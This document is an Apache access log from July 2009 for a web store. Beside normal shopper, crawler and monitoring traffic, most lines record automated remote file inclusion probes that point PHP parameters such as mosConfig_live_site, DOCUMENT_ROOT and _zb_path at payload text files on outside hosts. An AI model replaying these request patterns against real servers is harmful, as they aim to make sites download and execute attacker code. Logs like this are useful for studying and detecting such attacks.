140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:44 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
140.120.136.226 - - [06/Jul/2009:00:31:47 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
218.37.26.230 - - [06/Jul/2009:00:31:52 -0400] "GET /logs/access_log.Q109053000//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
218.37.26.230 - - [06/Jul/2009:00:31:52 -0400] "GET /logs//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
218.37.26.230 - - [06/Jul/2009:00:31:52 -0400] "GET //logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
140.120.136.226 - - [06/Jul/2009:00:32:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L313FD64E7AD374005FE0013+M37+ENG HTTP/1.1" 200 38026 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):tissue%20graft%20harvester" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
209.59.12.99 - - [06/Jul/2009:00:32:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
140.120.136.226 - - [06/Jul/2009:00:32:06 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L313FD6437D8374007E90013+M37+ENG HTTP/1.1" 200 38016 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313FD64E7AD374005FE0013+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
218.37.26.230 - - [06/Jul/2009:00:32:14 -0400] "GET /logs/access_log.Q109052500//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
67.208.139.72 - - [06/Jul/2009:00:32:41 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:32:41 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:32:41 -0400] "GET /logs/access_log.Q109061400%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:32:47 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:32:47 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:32:48 -0400] "GET /logs/access_log.Q109061400%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:33:19 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:33:19 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:33:20 -0400] "GET /logs/access_log.Q109052700%20%20//yabbse/Sources/Packages.php?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:34:32 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c1.gif.mno HTTP/1.0" 200 263 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [06/Jul/2009:00:36:48 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:36:48 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:36:48 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:00:36:48 -0400] "GET //?_zb_path=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.70.114 - - [06/Jul/2009:00:36:49 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:36:49 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:36:49 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:36:52 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:36:54 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:37:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.174.82.220 - - [06/Jul/2009:00:37:05 -0400] "GET /logs/access_log.Q109051200//?_zb_path=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.174.82.220 - - [06/Jul/2009:00:37:05 -0400] "GET /logs//?_zb_path=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 200 8391 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.246.20.221 - - [06/Jul/2009:00:38:01 -0400] "GET /logs/access_log.Q109053100//cross.php?url=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:00:38:01 -0400] "GET //cross.php?url=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:00:38:01 -0400] "GET /logs//cross.php?url=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.246.20.221 - - [06/Jul/2009:00:38:08 -0400] "GET /logs/access_log.Q109060400//cross.php?url=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
220.231.126.252 - - [06/Jul/2009:00:39:26 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:39:30 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:39:30 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:39:30 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:39:34 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:39:37 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:39:37 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:00:39:45 -0400] "GET /logs//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 278 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:00:39:45 -0400] "GET //logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 273 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:00:39:45 -0400] "GET /logs/access_log.Q109053000%20%20//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 302 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:00:39:51 -0400] "GET /logs/access_log.Q109052500%20%20//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 302 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:40:20 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:40:20 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:00:40:26 -0400] "GET /logs/access_log.Q109053100//?_zb_path=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
220.231.126.252 - - [06/Jul/2009:00:41:09 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:42:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.208.139.72 - - [06/Jul/2009:00:42:24 -0400] "GET /logs/access_log.Q109061400////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:00:42:55 -0400] "GET /logs/access_log.Q109053000//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 300 "-" "Mozilla/5.0"
60.43.229.5 - - [06/Jul/2009:00:42:56 -0400] "GET /logs/access_log.Q109052500//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 300 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:43:13 -0400] "GET /logs/access_log.Q109061400////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:43:49 -0400] "GET /images/_notes/home_connect_over.gif.mno HTTP/1.0" 200 253 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [06/Jul/2009:00:44:26 -0400] "GET /logs/access_log.Q109061100/phprojekt/lib/layout/venus/venus.php?path_pre=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:39 -0400] "GET /errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:39 -0400] "GET /logs/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:39 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:39 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:50 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:50 -0400] "GET /logs/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:50 -0400] "GET /errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:44:50 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:51 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:51 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:51 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:53 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:53 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:53 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:59 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:59 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:44:59 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:45:00 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:45:01 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:45:01 -0400] "GET //index.php?DOCUMENT_ROOT=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:45:01 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:45:04 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:45:04 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:45:04 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:45:08 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:45:12 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:45:47 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:46:46 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:46:46 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:47:01 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:47:01 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:47:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [06/Jul/2009:00:47:05 -0400] "GET /images/items/0016801_thumb.jpg HTTP/1.1" 200 1237 "-" "Googlebot-Image/1.0"
74.53.70.114 - - [06/Jul/2009:00:47:27 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [06/Jul/2009:00:47:28 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:48:34 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:48:34 -0400] "GET //?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:48:34 -0400] "GET /logs//?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:48:59 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:49:02 -0400] "GET /logs/access_log.Q109051300//?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:49:07 -0400] "GET //?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:49:07 -0400] "GET /logs//?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:49:07 -0400] "GET /logs/access_log.Q109051800//?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:00:49:32 -0400] "GET /logs/access_log.Q109051300//?_zb_path=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:00:49:57 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:49:59 -0400] "GET /errors.php?error=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:49:59 -0400] "GET /logs/errors.php?error=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:49:59 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:50:04 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:50:33 -0400] "GET /logs/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:50:33 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:50:33 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:50:37 -0400] "GET /errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
119.93.90.155 - - [06/Jul/2009:00:50:50 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:51:57 -0400] "GET /errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:51:57 -0400] "GET /logs/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:51:57 -0400] "GET /logs/access_log.Q109061700/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:51:57 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:52:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.231.126.252 - - [06/Jul/2009:00:52:34 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:52:34 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:52:44 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:54:50 -0400] "GET /logs/access_log.Q108071300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Jul/2009:00:57:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.231.126.252 - - [06/Jul/2009:00:58:49 -0400] "GET /logs/access_log.Q109060400%20%20/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:00:59:11 -0400] "GET /logs/access_log.Q109061700%20%20/errors.php?error=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
